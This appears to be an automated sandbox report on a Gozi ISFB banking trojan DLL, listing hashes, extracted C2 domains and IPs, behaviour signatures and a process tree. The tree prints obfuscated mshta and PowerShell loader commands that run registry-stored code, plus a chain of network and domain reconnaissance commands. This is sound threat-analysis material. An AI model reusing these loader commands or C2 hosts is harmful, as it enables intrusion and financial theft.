Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2022 16:03

General

  • Target

    de00c4750accf516704b8c0df265c24a.dll

  • Size

    300KB

  • MD5

    de00c4750accf516704b8c0df265c24a

  • SHA1

    eddbc6019ec7ba82d3c5b4c59efe797ff1df9f75

  • SHA256

    7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc

  • SHA512

    b0e6bbbdae36bd81f63dbab9296515d3a389fa6acb397476058ae202e66026ca8dc523fb35c6b7145a87d6e61e3833e396873e61e733152ccbaa39387bada96f

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3448
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1816
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4104
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3720
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3020
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4424
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3932
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:516
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"
                5⤵
                  PID:2720
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:696
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"
                  5⤵
                    PID:1932
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:2616
              • C:\Windows\system32\cmd.exe
                cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1860
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic computersystem get domain
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3656
                • C:\Windows\system32\more.com
                  more
                  3⤵
                    PID:1344
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                  2⤵
                    PID:5028
                  • C:\Windows\system32\cmd.exe
                    cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2876
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo.exe
                      3⤵
                      • Gathers system information
                      PID:4020
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                    2⤵
                      PID:3936
                    • C:\Windows\system32\cmd.exe
                      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4668
                      • C:\Windows\system32\net.exe
                        net view
                        3⤵
                        • Discovers systems in the same network
                        PID:1160
                    • C:\Windows\system32\cmd.exe
                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                      2⤵
                        PID:4240
                      • C:\Windows\system32\cmd.exe
                        cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4452
                        • C:\Windows\system32\nslookup.exe
                          nslookup 127.0.0.1
                          3⤵
                            PID:4388
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                          2⤵
                            PID:4448
                          • C:\Windows\system32\cmd.exe
                            cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                            2⤵
                              PID:2232
                              • C:\Windows\system32\tasklist.exe
                                tasklist.exe /SVC
                                3⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3144
                            • C:\Windows\system32\cmd.exe
                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                              2⤵
                                PID:2728
                              • C:\Windows\system32\cmd.exe
                                cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                2⤵
                                  PID:3576
                                  • C:\Windows\system32\driverquery.exe
                                    driverquery.exe
                                    3⤵
                                      PID:3936
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                    2⤵
                                      PID:4472
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                      2⤵
                                        PID:3484
                                        • C:\Windows\system32\reg.exe
                                          reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
                                          3⤵
                                            PID:4616
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                          2⤵
                                            PID:2256
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                            2⤵
                                              PID:3516
                                              • C:\Windows\system32\net.exe
                                                net config workstation
                                                3⤵
                                                  PID:1152
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 config workstation
                                                    4⤵
                                                      PID:4456
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                  2⤵
                                                    PID:2400
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                    2⤵
                                                      PID:1976
                                                      • C:\Windows\system32\nltest.exe
                                                        nltest /domain_trusts
                                                        3⤵
                                                          PID:2588
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                        2⤵
                                                          PID:4276
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                          2⤵
                                                            PID:4912
                                                            • C:\Windows\system32\nltest.exe
                                                              nltest /domain_trusts /all_trusts
                                                              3⤵
                                                                PID:5012
                                                            • C:\Windows\system32\cmd.exe
                                                              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                              2⤵
                                                                PID:844
                                                              • C:\Windows\system32\cmd.exe
                                                                cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                                2⤵
                                                                  PID:920
                                                                  • C:\Windows\system32\net.exe
                                                                    net view /all /domain
                                                                    3⤵
                                                                    • Discovers systems in the same network
                                                                    PID:4036
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                                  2⤵
                                                                    PID:1092
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                                    2⤵
                                                                      PID:2528
                                                                      • C:\Windows\system32\net.exe
                                                                        net view /all
                                                                        3⤵
                                                                        • Discovers systems in the same network
                                                                        PID:4892
                                                                    • C:\Windows\system32\cmd.exe
                                                                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                                      2⤵
                                                                        PID:5088
                                                                      • C:\Windows\system32\cmd.exe
                                                                        cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"
                                                                        2⤵
                                                                          PID:1980
                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:536

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v6

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        a345edcdee52303ac713c76b2366a94c

                                                                        SHA1

                                                                        4452c95702106a78f24f701612788561e04c6407

                                                                        SHA256

                                                                        4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d

                                                                        SHA512

                                                                        3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        44B

                                                                        MD5

                                                                        f7aea2435aa888b709ca20f816c33bfd

                                                                        SHA1

                                                                        38717c9a73b5f8bd399839cbe0aa57518427e758

                                                                        SHA256

                                                                        f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

                                                                        SHA512

                                                                        1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        42bfa4737502d07aa54f4c8ee04c5fef

                                                                        SHA1

                                                                        7198ae79a9c046de5d684acfd132b37f00f6a425

                                                                        SHA256

                                                                        3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36

                                                                        SHA512

                                                                        5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        42bfa4737502d07aa54f4c8ee04c5fef

                                                                        SHA1

                                                                        7198ae79a9c046de5d684acfd132b37f00f6a425

                                                                        SHA256

                                                                        3ab1b367877d3869cf3c6996a677d215ada1f76719a788bd23f622dd311d3d36

                                                                        SHA512

                                                                        5f8500e06373e66eb5fa954aafb5cbad214994442d67e8d2f21032f350b2d8e6fe7a79083322fb8383deece1678c32cde030e226e12346cd604366351ad74c1d

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        f2ea599a2b3969ca84eef5bfcb3872f5

                                                                        SHA1

                                                                        ea8db863a41c24696622269c1e9a59470d81d5ae

                                                                        SHA256

                                                                        f4afef97443809ed08b7b279fb70ddef9e3e2ae96dbf0f0f8878d342c53ee765

                                                                        SHA512

                                                                        6d18d72d27153253d36c2943d01ec09fded565afb6d6094c4a7062132ad60c4ad58ccbfc035644784ed338d543325f2e3062138cafebd4e4b6281f346a03d183

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        550324b3d2c3fccbf11991e605fb633a

                                                                        SHA1

                                                                        0e72da4bfa6e52f9b5627a825038f85135dc341a

                                                                        SHA256

                                                                        bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1

                                                                        SHA512

                                                                        49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        550324b3d2c3fccbf11991e605fb633a

                                                                        SHA1

                                                                        0e72da4bfa6e52f9b5627a825038f85135dc341a

                                                                        SHA256

                                                                        bc7180b72043de2e008063fcc5f952b964d9c9530ad2aab4752aec84095df3a1

                                                                        SHA512

                                                                        49883798521b722a2f40217ae8c96d960c6ccf31854d4b9008ce86700a67667e0168a798e1fb933e118fde9de890f40fc9ede8617356b7bd58b8ab1a46cc0f20

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        94b550334ec2b1b98472ead5fce8f180

                                                                        SHA1

                                                                        d2f658d2e49fcdc6c43b91e1dc712922f6412945

                                                                        SHA256

                                                                        95a7fe2794be40bd2ac401f1b64b163db7c497887cc7833c59191e69cb8a4ca1

                                                                        SHA512

                                                                        004cfcdf654e8160192b9181586c0ed1493c8638b77cf718f3e5419054b95db288412d98abdbfde6720e283548ad1ab3a172ad3ea33cb9f796c212e928c1d979

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        35KB

                                                                        MD5

                                                                        de21ae01f00b8ae78b2d39e2055d1dc0

                                                                        SHA1

                                                                        397a864a9dc4f574820996dc4d32a37659d0b531

                                                                        SHA256

                                                                        d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937

                                                                        SHA512

                                                                        d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        35KB

                                                                        MD5

                                                                        de21ae01f00b8ae78b2d39e2055d1dc0

                                                                        SHA1

                                                                        397a864a9dc4f574820996dc4d32a37659d0b531

                                                                        SHA256

                                                                        d369bd389a25236dfcc4910b99a40c0aab815e3544745230dcabef3beab75937

                                                                        SHA512

                                                                        d03ae00a7b999682ebfe93858349b01fc95b22910e48958d71aa019ea6d1aa7deb9bd0042c59e2ad07a4d1a454d6969cf86d53be557b93a3871d8c7437a61816

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        397eb325e338a7924c540b5bcd94e374

                                                                        SHA1

                                                                        f88da33ae78e5fd848531e462da24a9a7c57de88

                                                                        SHA256

                                                                        6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c

                                                                        SHA512

                                                                        f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        397eb325e338a7924c540b5bcd94e374

                                                                        SHA1

                                                                        f88da33ae78e5fd848531e462da24a9a7c57de88

                                                                        SHA256

                                                                        6cbecfa984f5200f16101f26d5e2c21290cfecc9a4621f880cff2e2392b3870c

                                                                        SHA512

                                                                        f20765df381088b9e293dac8736d1475f90c6a732e7e148afadf69aa862f3f7c414a2a0b02d58555b43fe71cc4d28f737648ea97d0ee18395d472ffd4ab30a1e

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        f1a2aa1f4f0c2e950ca2e946f24e52a7

                                                                        SHA1

                                                                        5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0

                                                                        SHA256

                                                                        1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed

                                                                        SHA512

                                                                        54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        f1a2aa1f4f0c2e950ca2e946f24e52a7

                                                                        SHA1

                                                                        5a6aa89b4cd8a10c7e968b3d357e8b438c7533d0

                                                                        SHA256

                                                                        1fc846218d715bb746962b8978905a7b9f8c559c56ca1ca0d558dfba721d67ed

                                                                        SHA512

                                                                        54a2825defb8e69afdb4f23cacb80b3ac881a981566dee1eba4d6c916927ef7e74f83ac71959f829da710c540858f183beeef162dcb95ad992249b4732de810f

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        9bae8ae2e7f60de0d8c3f9809a365b5a

                                                                        SHA1

                                                                        c05309024e67723dbc40583390d9deb970208a30

                                                                        SHA256

                                                                        9ef11a026250169cb0eca6369809bee07b0f24c5c1933938c25f4f84eb5d0abb

                                                                        SHA512

                                                                        0a55a13b234f55851cfe4b49d8cbf24c50db3805aeb00a3ca8004824c045fb0a3619e8a038b849f953672e2092a3e43bc945e7902458fb0b580f41cdaeddfc0a

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        24e087934651d6f0a5885fa46f185864

                                                                        SHA1

                                                                        b20946bd3d31fcd75bc758c8e659de9dafaf20eb

                                                                        SHA256

                                                                        b1626a5b8040ba8fbc5f15bdbde39f8e25177873df1fd2865db6949bc263af02

                                                                        SHA512

                                                                        f98260eb89115d6f26e03a6d866bd6bebcfb6a02dd69814f9a15e617670527556f8e7fdbc9f72ab323585169b28783a95982b929722294812ef0e4fa91ded06e

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        eb94ae3ce4b86bff9cafe1503fbc001d

                                                                        SHA1

                                                                        0bc3aee0a38c82f1e6775b1428219e7460e38ace

                                                                        SHA256

                                                                        b037abcec90bc47921db5c251215e9cb135511d0b08ce395fd697b88d1e99f6b

                                                                        SHA512

                                                                        922243683bad6ef9ccb80fff75c8ff44673acd5c8f52e693c66e3e35589a12bd5ee24d875dea2759d6912a2159aa1d7086e765dd488bfef11eb531c9fe863aa2

                                                                      • C:\Users\Admin\AppData\Local\Temp\6602.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        a345edcdee52303ac713c76b2366a94c

                                                                        SHA1

                                                                        4452c95702106a78f24f701612788561e04c6407

                                                                        SHA256

                                                                        4de5d19e13c2eab729c6a8ec04deeda952c11bb9651560a75248f46da86f9f2d

                                                                        SHA512

                                                                        3286dbb2a3619004b3ed58442cef3bb89db0ab2ab98627674e37db503de1b7c8f2147c99e44ebb8b98a7f6f13ef13b6dd501993b7a0dd0d579e01023b971695a

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        a9eead4a76288738990c8668032dd780

                                                                        SHA1

                                                                        ece0771b0b40abec808cd5e8dedfbebbd4345d68

                                                                        SHA256

                                                                        925c00351b791b62cd80c6d7dab5f276374ae454146317405984eabd303746dc

                                                                        SHA512

                                                                        b2ccc1ee6d4eb958098ea279c27093836ccc6a7e2148602fcb5ee2dbc457c169f30179047ab206a85ba66cf696edb6005f0819558a00e372c36458d37b5fa4bb

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        860be3be01f3f3c1bb8223c4b4ebf8d5

                                                                        SHA1

                                                                        98662fcdbf155d942f6aec76e367f0fef5cb1f21

                                                                        SHA256

                                                                        51f4a4c2de2bb96c36d8e1fc4226bf530d8c3d90347ce8c4244964c1b835ba54

                                                                        SHA512

                                                                        63f3f394d791aae4dd154109e21dc6d6b21cad707296fbc7ac1c6179febdf17d6313d9b2ef85a8be66aea79f47e983a08af2c551eb4c94a765393a7ce450ba8b

                                                                      • C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.dll

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        8495c9cbe1593820014899a043577e1b

                                                                        SHA1

                                                                        b395a19a3262dc61ea9f3174cad05e194fcbbe57

                                                                        SHA256

                                                                        08496276bf461cb5696ddbde59bf09077bf8809e27c9e4b4e74d8d59409996c8

                                                                        SHA512

                                                                        035d7f718a2d50e578b2c1464ddd1fb91a7ef4b656ff9bbd2af4adcdf44b839ce7c759c524ba02fffab3b09aef704a36eba7a0429e3836c7a5c3f0c207bc9715

                                                                      • C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.dll

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        ea0f2464b104a78625ed3074b10d5b26

                                                                        SHA1

                                                                        871ebae4ea06340b952d4671f6cf79013808bf22

                                                                        SHA256

                                                                        4823aab825570b456b0ded382a952b148c6fd24127143f214d93e8a9fe8c8506

                                                                        SHA512

                                                                        82fdfcef702db4bec115d91411e67512a332a7113150fabfcae74f71e9e7090a489f6ebfccaa5e3b28c3c934ce089973e3d07338a47f6d67f2f72f0b998b2f10

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP

                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        e250c595c30addb02ffc6984e63a7380

                                                                        SHA1

                                                                        b44e41b7d62b61f9b04eed3e311910f34a0ebedb

                                                                        SHA256

                                                                        15f35b53c4861185a583a1dbcb3222d7ac9654681b0dbc2fe031d59757baa063

                                                                        SHA512

                                                                        8abf7fe5b21c2a61c01c7eefcc996d2e7068d245aba9071c7db224abbd32b16610efafca56171728d2da0ebcbeb98116847bdaa8071c2111e8686700f96abfd6

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.0.cs

                                                                        Filesize

                                                                        410B

                                                                        MD5

                                                                        9a10482acb9e6952b96f4efc24d9d783

                                                                        SHA1

                                                                        5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                        SHA256

                                                                        a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                        SHA512

                                                                        e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline

                                                                        Filesize

                                                                        369B

                                                                        MD5

                                                                        f2734214002408a7eccd2fbae5870da5

                                                                        SHA1

                                                                        fde6d5c4e61dff27f46f69c480155e1101397700

                                                                        SHA256

                                                                        552cfb233eff0461a558e7e25cea4e6b720ce96953fa1ee5d231c4ae67fdf102

                                                                        SHA512

                                                                        3e2cfa712aba0bc2ba463e9543e6270f49134533b10aa4b851d5e4aec97c2daec663f484b412715fb3df6496617c97974812fef5edf569a9784377859b3c56b5

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP

                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        83ab673e353bc97b876da6cfc8b171d8

                                                                        SHA1

                                                                        4a661313af68b943f2580cdbcf76b19a89e12734

                                                                        SHA256

                                                                        2a0cbd619f15e2cc9a716556eed90f2e8f130999317d327fa1d96744309e450e

                                                                        SHA512

                                                                        a17c1dfffaa789762e8ec8146d1d0c1136f5a706d2c3387965cbb4bf58b35cb7db764164d263ce371cbc4dd39d3a4fad8b18928caaf73307c696e74bfd722f93

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.0.cs

                                                                        Filesize

                                                                        400B

                                                                        MD5

                                                                        aca9704199c51fde14b8bf8165bc2a4c

                                                                        SHA1

                                                                        789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                        SHA256

                                                                        cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                        SHA512

                                                                        a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline

                                                                        Filesize

                                                                        369B

                                                                        MD5

                                                                        340f65806e42a1b022861685812d236b

                                                                        SHA1

                                                                        a53ffde123a1837fe255d764e7a992ab905fb8b9

                                                                        SHA256

                                                                        b75d827e0d31904c9782c6ed7f767265477310971a1f4335efc140f0f074ceb7

                                                                        SHA512

                                                                        30b0f1d6ca38cf067b85fb51556b52f2dd743055ea08b8e72d2ad654aff178093d13ca0c19b4b6a1c728978df90b2e7b9941ca2b3bf75694c7220d40b28579bb

                                                                      • memory/516-143-0x0000000000000000-mapping.dmp

                                                                      • memory/536-168-0x00000223FA1E0000-0x00000223FA283000-memory.dmp

                                                                        Filesize

                                                                        652KB

                                                                      • memory/696-150-0x0000000000000000-mapping.dmp

                                                                      • memory/844-222-0x0000000000000000-mapping.dmp

